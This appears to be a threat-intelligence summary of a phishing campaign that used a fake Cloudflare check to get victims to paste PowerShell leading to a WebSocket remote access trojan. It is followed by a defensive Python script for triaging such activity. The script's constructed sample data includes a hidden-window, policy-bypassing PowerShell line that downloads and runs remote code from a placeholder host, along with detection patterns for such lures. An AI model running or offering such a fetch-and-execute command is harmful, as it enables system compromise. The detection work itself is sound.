Overview
- The coordinated operation on October 8 targeted staff at the International Red Cross, UNICEF, the Norwegian Refugee Council, the Council of Europe’s Register of Damage for Ukraine, and multiple regional administrations.
- Emails impersonating the Ukrainian President’s Office attached an eight-page PDF linking to zoomconference.app and a fake Cloudflare check that told users to paste a token, triggering a PowerShell command.
- A three-stage chain delivered an obfuscated downloader and reconnaissance tool before deploying a WebSocket-based remote access trojan capable of command execution and data exfiltration on infrastructure tied to Russian providers.
- User-facing domains were active for about 24 hours before takedown, yet backend command-and-control artifacts persisted, with preparations traced to March 27 through registrations such as goodhillsenterprise.com.
- Investigators linked a related Android spyware cluster and noted overlaps with tactics seen in Russia-linked ColdRiver, without firm attribution, and advised restricting PowerShell, enforcing execution policies, and monitoring suspicious WebSocket connections.
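A defender-side triage check for the chain summarised above (PowerShell launched from a pasted Run-dialog command, then a WebSocket client for command and control), written as an added example that is not part of the original report; the record layout, field names, and sample values are constructed and assumed, not real telemetry from the incident.

```python
import re

# Constructed sample records (not real telemetry). Field names mimic Sysmon
# process-creation and PowerShell 4104 script-block events; hosts are placeholders.
SAMPLE_RECORDS = [
    {"Id": "p1", "Source": "process", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -nop -ep bypass -c "iex (iwr https://placeholder.invalid/t)"'},
    {"Id": "p2", "Source": "process", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"Id": "s1", "Source": "scriptblock", "ScriptBlockText":
     '$ws = New-Object System.Net.WebSockets.ClientWebSocket; '
     '$ws.ConnectAsync([Uri]"wss://placeholder.invalid/ws", [Threading.CancellationToken]::None).Wait()'},
    {"Id": "s2", "Source": "scriptblock", "ScriptBlockText":
     "Get-Process | Where-Object CPU -gt 10 | Sort-Object CPU"},
]

# Flags typical of "paste this into Run" lures: hidden window, no profile,
# encoded or downloaded payloads handed to Invoke-Expression.
LURE_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-enc(?:odedcommand)?\s|"
                        r"\biex\b|invoke-expression|downloadstring", re.I)
EXEC_POLICY_BYPASS = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)
WEBSOCKET = re.compile(r"System\.Net\.WebSockets|ClientWebSocket|\bwss?://", re.I)
RUN_DIALOG_PARENTS = {"explorer.exe"}  # the Win+R Run box launches children via explorer.exe

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_record(rec):
    """Return sorted finding names for one record (empty list if nothing matched)."""
    findings = set()
    if rec["Source"] == "process":
        if basename(rec.get("Image", "")) not in {"powershell.exe", "pwsh.exe"}:
            return []
        cmd = rec.get("CommandLine", "")
        if basename(rec.get("ParentImage", "")) in RUN_DIALOG_PARENTS and LURE_FLAGS.search(cmd):
            findings.add("powershell-from-run-dialog-with-lure-flags")
        if EXEC_POLICY_BYPASS.search(cmd):
            findings.add("execution-policy-bypass")
        if WEBSOCKET.search(cmd):
            findings.add("websocket-in-command-line")
    elif rec["Source"] == "scriptblock" and WEBSOCKET.search(rec.get("ScriptBlockText", "")):
        findings.add("websocket-client-in-scriptblock")
    return sorted(findings)

def triage(records):
    """Map record Id -> findings for every record that raised at least one."""
    return {r["Id"]: f for r in records if (f := triage_record(r))}

if __name__ == "__main__":
    for rec_id, found in triage(SAMPLE_RECORDS).items():
        print(rec_id, ", ".join(found))
```

Script-block logging (event 4104) must be enabled for the second check to see anything, and the patterns are a starting point for tuning against a site's own baseline rather than a complete signature.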